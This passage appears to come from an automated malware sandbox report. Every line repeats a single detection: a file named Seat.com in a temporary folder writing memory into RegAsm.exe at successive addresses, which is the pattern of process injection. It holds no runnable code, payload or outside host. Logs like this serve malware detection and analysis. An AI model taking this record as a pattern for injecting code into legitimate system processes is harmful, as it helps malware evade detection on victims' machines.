                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A23C28
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A23C8C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A23CF0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A23D54
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A23DB8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A23E1C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A23E80
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A23EE4
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A23F48
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A23FAC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A24010
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A24074
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A240D8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2413C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A241A0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A24204
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A24268
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A242CC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A24330
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A24394
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A243F8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2445C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A244C0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A24524
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A24588
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A245EC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A24650
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A246B4
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A24718
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2477C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A247E0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A24844
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A248A8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2490C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A24970
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A249D4
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A24A38
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A24A9C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A24B00
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A24B64
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A24BC8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A24C2C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A24C90
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A24CF4
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A24D58
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A24DBC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A24E20
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A24E84
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A24EE8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A24F4C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A24FB0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A25014
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A25078
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A250DC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A25140
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A251A4
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A25208
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2526C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A252D0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A25334
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A25398
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A253FC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A25460
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A254C4
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A25528
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2558C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A255F0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A25654
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A256B8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2571C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A25780
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A257E4
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A25848
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A258AC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A25910
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A25974
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A259D8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A25A3C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A25AA0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A25B04
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A25B68
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A25BCC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A25C30
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A25C94
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A25CF8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A25D5C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A25DC0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A25E24
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A25E88
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A25EEC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A25F50
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A25FB4
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A26018
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2607C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A260E0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A26144
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A261A8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2620C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A26270
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A262D4
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A26338
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2639C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A26400
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A26464
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A264C8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2652C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A26590
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A265F4
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A26658
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A266BC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A26720
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A26784
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A267E8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2684C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A268B0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A26914
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A26978
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A269DC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A26A40
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A26AA4
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A26B08
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A26B6C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A26BD0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A26C34
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A26C98
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A26CFC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A26D60
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A26DC4
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A26E28
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A26E8C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A26EF0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A26F54
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A26FB8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2701C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A27080
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A270E4
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A27148
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A271AC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A27210
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A27274
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A272D8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2733C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A273A0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A27404
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A27468
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A274CC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A27530
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A27594
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A275F8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2765C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A276C0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A27724
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A27788
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A277EC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A27850
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A278B4
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A27918
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2797C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A279E0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A27A44
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A27AA8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A27B0C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A27B70
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A27BD4
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A27C38
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A27C9C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A27D00
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A27D64
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A27DC8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A27E2C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A27E90
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A27EF4
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A27F58
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A27FBC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A28020
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A28084
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A280E8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2814C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A281B0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A28214
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A28278
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A282DC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A28340
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A283A4
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A28408
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2846C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A284D0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A28534
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A28598
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A285FC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A28660
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A286C4
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A28728
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2878C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A287F0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A28854
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A288B8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2891C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A28980
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A289E4
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A28A48
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A28AAC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A28B10
